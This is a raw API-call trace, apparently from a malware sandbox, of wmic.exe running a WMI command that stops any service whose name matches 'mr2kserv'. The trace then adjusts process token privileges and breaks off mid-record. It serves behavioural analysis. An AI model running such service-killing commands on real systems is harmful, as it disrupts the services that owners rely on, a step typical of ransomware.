lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 70 [0251.864] malloc (_Size=0x18) returned 0x43cba0 [0251.864] lstrlenW (lpString="stopservice") returned 11 [0251.864] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0251.864] malloc (_Size=0x18) returned 0x43cb20 [0251.864] free (_Block=0x0) [0251.864] free (_Block=0x43cba0) [0251.865] malloc (_Size=0x30) returned 0x438640 [0251.865] lstrlenW (lpString="QUIT") returned 4 [0251.865] lstrlenW (lpString="path") returned 4 [0251.865] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0251.865] lstrlenW (lpString="EXIT") returned 4 [0251.865] lstrlenW (lpString="path") returned 4 [0251.865] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0251.865] free (_Block=0x438640) [0251.865] WbemLocator:IUnknown:AddRef (This=0x1d51390) returned 0x2 [0251.865] malloc (_Size=0x30) returned 0x438640 [0251.865] lstrlenW (lpString="/") returned 1 [0251.865] lstrlenW (lpString="path") returned 4 [0251.865] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0251.865] lstrlenW (lpString="-") returned 1 [0251.865] lstrlenW (lpString="path") returned 4 [0251.865] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0251.865] lstrlenW (lpString="CLASS") returned 5 [0251.865] lstrlenW (lpString="path") returned 4 [0251.865] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0251.865] lstrlenW (lpString="PATH") returned 4 [0251.866] lstrlenW (lpString="path") returned 4 [0251.866] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0251.866] lstrlenW (lpString="/") returned 1 [0251.866] lstrlenW (lpString="Win32_Service") returned 13 [0251.866] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0251.866] lstrlenW (lpString="-") returned 1 [0251.866] lstrlenW (lpString="Win32_Service") returned 13 [0251.866] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0251.866] lstrlenW (lpString="Win32_Service") returned 13 [0251.866] malloc (_Size=0x1c) returned 0x43cf00 [0251.866] lstrlenW (lpString="Win32_Service") returned 13 [0251.866] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0251.866] lstrlenW (lpString="Win32_Service") returned 13 [0251.866] malloc (_Size=0x1c) returned 0x437140 [0251.866] lstrlenW (lpString="Win32_Service") returned 13 [0251.866] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xffffffffffe16850 | out: _String=0x0, _Context=0xffffffffffe16850) returned 0x0 [0251.866] lstrlenW (lpString="") returned 0 [0251.866] lstrlenW (lpString="WHERE") returned 5 [0251.866] lstrlenW (lpString="where") returned 5 [0251.866] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0251.866] lstrlenW (lpString="/") returned 1 [0251.866] lstrlenW (lpString="name like '%%mr2kserv%%'") returned 24 [0251.866] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%mr2kserv%%'", cchCount1=24, lpString2="/", cchCount2=1) returned 3 [0251.867] lstrlenW (lpString="-") returned 1 [0251.867] lstrlenW (lpString="name like '%%mr2kserv%%'") returned 24 [0251.867] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%mr2kserv%%'", cchCount1=24, lpString2="-", cchCount2=1) returned 3 [0251.867] lstrlenW (lpString="name like '%%mr2kserv%%'") returned 24 [0251.867] malloc (_Size=0x32) returned 0x438680 [0251.867] lstrlenW (lpString="name like '%%mr2kserv%%'") returned 24 [0251.867] lstrlenW (lpString="/") returned 1 [0251.867] lstrlenW (lpString="call") returned 4 [0251.867] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0251.867] lstrlenW (lpString="-") returned 1 [0251.867] lstrlenW (lpString="call") returned 4 [0251.867] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0251.867] lstrlenW (lpString="call") returned 4 [0251.867] malloc (_Size=0xa) returned 0x43cba0 [0251.867] lstrlenW (lpString="call") returned 4 [0251.867] lstrlenW (lpString="GET") returned 3 [0251.867] lstrlenW (lpString="call") returned 4 [0251.867] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0251.867] lstrlenW (lpString="LIST") returned 4 [0251.867] lstrlenW (lpString="call") returned 4 [0251.867] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0251.867] lstrlenW (lpString="SET") returned 3 [0251.868] lstrlenW (lpString="call") returned 4 [0251.868] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0251.868] lstrlenW (lpString="CREATE") returned 6 [0251.868] lstrlenW (lpString="call") returned 4 [0251.868] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0251.868] lstrlenW (lpString="CALL") returned 4 [0251.868] lstrlenW (lpString="call") returned 4 [0251.868] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0251.868] lstrlenW (lpString="/") returned 1 [0251.868] lstrlenW (lpString="stopservice") returned 11 [0251.868] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0251.868] lstrlenW (lpString="-") returned 1 [0251.868] lstrlenW (lpString="stopservice") returned 11 [0251.868] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0251.868] lstrlenW (lpString="stopservice") returned 11 [0251.868] malloc (_Size=0x18) returned 0x43cbc0 [0251.868] lstrlenW (lpString="stopservice") returned 11 [0251.868] ??0CHString@@QEAA@XZ () returned 0x24d6d8 [0251.868] GetCurrentThreadId () returned 0xb18 [0251.868] GetCurrentThreadId () returned 0xb18 [0251.868] ??0CHString@@QEAA@XZ () returned 0x24d4a8 [0251.868] malloc (_Size=0x8) returned 0x43cf60 [0251.868] malloc (_Size=0x18) returned 0x43cbe0 [0251.869] malloc (_Size=0x18) returned 0x43cc00 [0251.869] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d51390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffc92950 | out: ppNamespace=0xffc92950*=0x1d63a98) returned 0x0 [0251.890] free (_Block=0x43cc00) [0251.890] CoSetProxyBlanket (pProxy=0x1d63a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0251.891] free (_Block=0x43cf60) [0251.891] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0251.891] free (_Block=0x43cbe0) [0251.891] malloc (_Size=0x18) returned 0x43cbe0 [0251.891] IWbemServices:GetObject (in: This=0x1d63a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x24d6b8*=0x0, ppCallResult=0x0 | out: ppObject=0x24d6b8*=0x1d8bfa0, ppCallResult=0x0) returned 0x0 [0251.917] free (_Block=0x43cbe0) [0251.917] IWbemClassObject:BeginMethodEnumeration (This=0x1d8bfa0, lEnumFlags=0) returned 0x0 [0251.917] IWbemClassObject:NextMethod (in: This=0x1d8bfa0, lFlags=0, pstrName=0x24d698*=0x0, ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x0 | out: pstrName=0x24d698*="StartService", ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x1d8c4a0) returned 0x0 [0251.917] lstrlenW (lpString="StartService") returned 12 [0251.917] lstrlenW (lpString="stopservice") returned 11 [0251.917] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0251.917] IUnknown:Release (This=0x1d8c4a0) returned 0x0 [0251.917] IWbemClassObject:NextMethod (in: This=0x1d8bfa0, lFlags=0, pstrName=0x24d698*=0x0, ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x0 | out: pstrName=0x24d698*="StopService", ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x1d8c4a0) returned 0x0 [0251.917] lstrlenW (lpString="StopService") returned 11 [0251.917] lstrlenW (lpString="stopservice") returned 11 [0251.917] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0251.917] malloc (_Size=0x70) returned 0x43cf60 [0251.917] ??0CHString@@QEAA@XZ () returned 0x24d068 [0251.918] GetCurrentThreadId () returned 0xb18 [0251.918] IWbemClassObject:GetNames (in: This=0x1d8c4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x24d060 | out: pNames=0x24d060*="\x01ƀ\x08") returned 0x0 [0251.918] SafeArrayGetLBound (in: psa=0x4e4ae0, nDim=0x1, plLbound=0x24d078 | out: plLbound=0x24d078) returned 0x0 [0251.918] SafeArrayGetUBound (in: psa=0x4e4ae0, nDim=0x1, plUbound=0x24d074 | out: plUbound=0x24d074) returned 0x0 [0251.918] SafeArrayGetElement (in: psa=0x4e4ae0, rgIndices=0x24d054, pv=0x24d058 | out: pv=0x24d058) returned 0x0 [0251.918] malloc (_Size=0x48) returned 0x43cfe0 [0251.918] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1d8c4a0, wszProperty="ReturnValue", ppQualSet=0x24cea8 | out: ppQualSet=0x24cea8*=0x1d513b0) returned 0x0 [0251.918] malloc (_Size=0x18) returned 0x43cbe0 [0251.918] IWbemQualifierSet:Get (in: This=0x1d513b0, wszName="CIMTYPE", lFlags=0, pVal=0x24cf30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0x24cf30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x1), plFlavor=0x0) returned 0x0 [0251.919] free (_Block=0x43cbe0) [0251.919] malloc (_Size=0x18) returned 0x43cbe0 [0251.919] IWbemClassObject:Get (in: This=0x1d8c4a0, wszName="ReturnValue", lFlags=0, pVal=0x24cfd8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x24ceb8*=2412288, plFlavor=0x0 | out: pVal=0x24cfd8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x24ceb8*=19, plFlavor=0x0) returned 0x0 [0251.919] malloc (_Size=0x18) returned 0x43cc00 [0251.919] IWbemQualifierSet:Get (in: This=0x1d513b0, wszName="read", lFlags=0, pVal=0x24cec0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffc92ac0), plFlavor=0x0 | out: pVal=0x24cec0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffc92ac0), plFlavor=0x0) returned 0x80041002 [0251.919] free (_Block=0x43cc00) [0251.919] malloc (_Size=0x18) returned 0x43cc00 [0251.920] IWbemQualifierSet:Get (in: This=0x1d513b0, wszName="write", lFlags=0, pVal=0x24cec0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffc92ac0), plFlavor=0x0 | out: pVal=0x24cec0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffc92ac0), plFlavor=0x0) returned 0x80041002 [0251.920] free (_Block=0x43cc00) [0251.920] malloc (_Size=0x18) returned 0x43cc00 [0251.920] malloc (_Size=0x18) returned 0x43cc20 [0251.920] IWbemQualifierSet:Get (in: This=0x1d513b0, wszName="Description", lFlags=0, pVal=0x24cf70*(varType=0x0, wReserved1=0x24, wReserved2=0x0, wReserved3=0x0, varVal1=0xffc34293, varVal2=0x24cf78), plFlavor=0x0 | out: pVal=0x24cf70*(varType=0x0, wReserved1=0x24, wReserved2=0x0, wReserved3=0x0, varVal1=0xffc34293, varVal2=0x24cf78), plFlavor=0x0) returned 0x80041002 [0251.920] free (_Block=0x43cc20) [0251.920] malloc (_Size=0x18) returned 0x43cc20 [0251.920] lstrlenA (lpString="Not Available") returned 13 [0251.920] malloc (_Size=0x1c) returned 0x43d030 [0251.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc222f0, cbMultiByte=-1, lpWideCharStr=0x43d030, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0251.920] free (_Block=0x43d030) [0251.920] IUnknown:Release (This=0x1d513b0) returned 0x0 [0251.920] malloc (_Size=0x48) returned 0x43d030 [0251.920] malloc (_Size=0x18) returned 0x43cc40 [0251.921] malloc (_Size=0x48) returned 0x43d080 [0251.921] malloc (_Size=0x70) returned 0x43d0d0 [0251.921] malloc (_Size=0x48) returned 0x43d150 [0251.921] free (_Block=0x43d080) [0251.921] free (_Block=0x43d030) [0251.921] free (_Block=0x43cfe0) [0251.921] free (_Block=0x43cc00) [0251.921] free (_Block=0x43cc20) [0251.921] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0251.921] IWbemClassObject:GetMethodQualifierSet (in: This=0x1d8bfa0, wszMethod="StopService", ppQualSet=0x24d5d8 | out: ppQualSet=0x24d5d8*=0x1d513b0) returned 0x0 [0251.921] malloc (_Size=0x18) returned 0x43cc20 [0251.921] IWbemQualifierSet:Get (in: This=0x1d513b0, wszName="Implemented", lFlags=0, pVal=0x24d5e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d410df7c0be, varVal2=0xffc344fb), plFlavor=0x0 | out: pVal=0x24d5e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d410df7c0be, varVal2=0xffc344fb), plFlavor=0x0) returned 0x80041002 [0251.922] free (_Block=0x43cc20) [0251.922] malloc (_Size=0x18) returned 0x43cc20 [0251.922] malloc (_Size=0x18) returned 0x43cc00 [0251.922] IWbemQualifierSet:Get (in: This=0x1d513b0, wszName="Description", lFlags=0, pVal=0x24d600*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffc92948, varVal2=0xb18), plFlavor=0x0 | out: pVal=0x24d600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0xb18), plFlavor=0x0) returned 0x0 [0251.922] free (_Block=0x43cc00) [0251.922] malloc (_Size=0x18) returned 0x43cc00 [0251.922] IUnknown:Release (This=0x1d513b0) returned 0x0 [0251.922] malloc (_Size=0x70) returned 0x43cfe0 [0251.922] malloc (_Size=0x70) returned 0x43d1a0 [0251.922] malloc (_Size=0x48) returned 0x43d060 [0251.922] malloc (_Size=0x18) returned 0x43cc60 [0251.922] malloc (_Size=0x70) returned 0x43d220 [0251.922] malloc (_Size=0x70) returned 0x43d2a0 [0251.922] malloc (_Size=0x48) returned 0x43d320 [0251.922] malloc (_Size=0x50) returned 0x43d370 [0251.922] malloc (_Size=0x70) returned 0x43d3d0 [0251.922] malloc (_Size=0x70) returned 0x43d450 [0251.922] malloc (_Size=0x48) returned 0x43d4d0 [0251.922] free (_Block=0x43d320) [0251.923] free (_Block=0x43d2a0) [0251.923] free (_Block=0x43d220) [0251.923] free (_Block=0x43d060) [0251.923] free (_Block=0x43d1a0) [0251.923] free (_Block=0x43cfe0) [0251.923] IUnknown:Release (This=0x1d8c4a0) returned 0x0 [0251.923] free (_Block=0x43d150) [0251.923] free (_Block=0x43d0d0) [0251.923] free (_Block=0x43cf60) [0251.923] IWbemClassObject:NextMethod (in: This=0x1d8bfa0, lFlags=0, pstrName=0x24d698*=0x0, ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x0 | out: pstrName=0x24d698*="PauseService", ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x1d8c4a0) returned 0x0 [0251.923] lstrlenW (lpString="PauseService") returned 12 [0251.923] lstrlenW (lpString="stopservice") returned 11 [0251.923] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0251.923] IUnknown:Release (This=0x1d8c4a0) returned 0x0 [0251.923] IWbemClassObject:NextMethod (in: This=0x1d8bfa0, lFlags=0, pstrName=0x24d698*=0x0, ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x0 | out: pstrName=0x24d698*="ResumeService", ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x1d8c4a0) returned 0x0 [0251.923] lstrlenW (lpString="ResumeService") returned 13 [0251.923] lstrlenW (lpString="stopservice") returned 11 [0251.923] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0251.923] IUnknown:Release (This=0x1d8c4a0) returned 0x0 [0251.923] IWbemClassObject:NextMethod (in: This=0x1d8bfa0, lFlags=0, pstrName=0x24d698*=0x0, ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x0 | out: pstrName=0x24d698*="InterrogateService", ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x1d8c4a0) returned 0x0 [0251.924] lstrlenW (lpString="InterrogateService") returned 18 [0251.924] lstrlenW (lpString="stopservice") returned 11 [0251.924] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0251.924] IUnknown:Release (This=0x1d8c4a0) returned 0x0 [0251.924] IWbemClassObject:NextMethod (in: This=0x1d8bfa0, lFlags=0, pstrName=0x24d698*=0x0, ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x0 | out: pstrName=0x24d698*="UserControlService", ppInSignature=0x24d6a0*=0x1d8c520, ppOutSignature=0x24d6a8*=0x1d8ca20) returned 0x0 [0251.924] lstrlenW (lpString="UserControlService") returned 18 [0251.924] lstrlenW (lpString="stopservice") returned 11 [0251.924] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0251.924] IUnknown:Release (This=0x1d8c520) returned 0x0 [0251.924] IUnknown:Release (This=0x1d8ca20) returned 0x0 [0251.924] IWbemClassObject:NextMethod (in: This=0x1d8bfa0, lFlags=0, pstrName=0x24d698*=0x0, ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x0 | out: pstrName=0x24d698*="Create", ppInSignature=0x24d6a0*=0x1d8e470, ppOutSignature=0x24d6a8*=0x1d8e970) returned 0x0 [0251.925] lstrlenW (lpString="Create") returned 6 [0251.925] lstrlenW (lpString="stopservice") returned 11 [0251.925] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0251.925] IUnknown:Release (This=0x1d8e470) returned 0x0 [0251.925] IUnknown:Release (This=0x1d8e970) returned 0x0 [0251.925] IWbemClassObject:NextMethod (in: This=0x1d8bfa0, lFlags=0, pstrName=0x24d698*=0x0, ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x0 | out: pstrName=0x24d698*="Change", ppInSignature=0x24d6a0*=0x1d8e1f0, ppOutSignature=0x24d6a8*=0x1d8e6f0) returned 0x0 [0251.925] lstrlenW (lpString="Change") returned 6 [0251.925] lstrlenW (lpString="stopservice") returned 11 [0251.925] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0251.925] IUnknown:Release (This=0x1d8e1f0) returned 0x0 [0251.925] IUnknown:Release (This=0x1d8e6f0) returned 0x0 [0251.925] IWbemClassObject:NextMethod (in: This=0x1d8bfa0, lFlags=0, pstrName=0x24d698*=0x0, ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x0 | out: pstrName=0x24d698*="ChangeStartMode", ppInSignature=0x24d6a0*=0x1d8c610, ppOutSignature=0x24d6a8*=0x1d8cb10) returned 0x0 [0251.925] lstrlenW (lpString="ChangeStartMode") returned 15 [0251.925] lstrlenW (lpString="stopservice") returned 11 [0251.925] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0251.925] IUnknown:Release (This=0x1d8c610) returned 0x0 [0251.925] IUnknown:Release (This=0x1d8cb10) returned 0x0 [0251.926] IWbemClassObject:NextMethod (in: This=0x1d8bfa0, lFlags=0, pstrName=0x24d698*=0x0, ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x0 | out: pstrName=0x24d698*="Delete", ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x1d8c4a0) returned 0x0 [0251.926] lstrlenW (lpString="Delete") returned 6 [0251.926] lstrlenW (lpString="stopservice") returned 11 [0251.926] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0251.926] IUnknown:Release (This=0x1d8c4a0) returned 0x0 [0251.926] IWbemClassObject:NextMethod (in: This=0x1d8bfa0, lFlags=0, pstrName=0x24d698*=0x0, ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x0 | out: pstrName=0x24d698*="GetSecurityDescriptor", ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x1d8c640) returned 0x0 [0251.926] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0251.926] lstrlenW (lpString="stopservice") returned 11 [0251.926] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0251.926] IUnknown:Release (This=0x1d8c640) returned 0x0 [0251.926] IWbemClassObject:NextMethod (in: This=0x1d8bfa0, lFlags=0, pstrName=0x24d698*=0x0, ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x0 | out: pstrName=0x24d698*="SetSecurityDescriptor", ppInSignature=0x24d6a0*=0x1d8c520, ppOutSignature=0x24d6a8*=0x1d8ca20) returned 0x0 [0251.926] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0251.926] lstrlenW (lpString="stopservice") returned 11 [0251.926] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0251.926] IUnknown:Release (This=0x1d8c520) returned 0x0 [0251.926] IUnknown:Release (This=0x1d8ca20) returned 0x0 [0251.926] IWbemClassObject:NextMethod (in: This=0x1d8bfa0, lFlags=0, pstrName=0x24d698*=0x0, ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x0 | out: pstrName=0x24d698*=0x0, ppInSignature=0x24d6a0*=0x0, ppOutSignature=0x24d6a8*=0x0) returned 0x40005 [0251.926] IUnknown:Release (This=0x1d8bfa0) returned 0x0 [0251.926] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0251.926] lstrlenW (lpString="SET") returned 3 [0251.926] lstrlenW (lpString="call") returned 4 [0251.926] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0251.927] lstrlenW (lpString="CREATE") returned 6 [0251.927] lstrlenW (lpString="call") returned 4 [0251.927] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0251.927] free (_Block=0x438640) [0251.927] malloc (_Size=0x8) returned 0x43cf60 [0251.927] lstrlenW (lpString="GET") returned 3 [0251.927] lstrlenW (lpString="call") returned 4 [0251.927] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0251.927] lstrlenW (lpString="LIST") returned 4 [0251.927] lstrlenW (lpString="call") returned 4 [0251.927] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0251.927] lstrlenW (lpString="ASSOC") returned 5 [0251.927] lstrlenW (lpString="call") returned 4 [0251.927] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0251.927] WbemLocator:IUnknown:AddRef (This=0x1d51390) returned 0x3 [0251.927] free (_Block=0x436a50) [0251.927] lstrlenW (lpString="") returned 0 [0251.927] lstrlenW (lpString="XDUWTFONO") returned 9 [0251.927] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0251.927] lstrlenW (lpString="XDUWTFONO") returned 9 [0251.927] malloc (_Size=0x14) returned 0x43cc80 [0251.927] lstrlenW (lpString="XDUWTFONO") returned 9 [0251.927] GetCurrentThreadId () returned 0xb18 [0251.927] GetCurrentProcess () returned 0xffffffffffffffff [0251.928] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x24f9e0 | out: TokenHandle=0x24f9e0*=0x298) returned 1 [0251.928] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24f9d8 | out: TokenInformation=0x0, ReturnLength=0x24f9d8) returned 0 [0251.928] malloc (_Size=0x118) returned 0x43cf80 [0251.928] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x43cf80, TokenInformationLength=0x118, ReturnLength=0x24f9d8 | out: TokenInformation=0x43cf80, ReturnLength=0x24f9d8) returned 1 [0251.928] AdjustTokenPrivileges (in: TokenHandle=0x298, DisableAllPrivileges=0, NewState=0x43cf80*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1318995773, 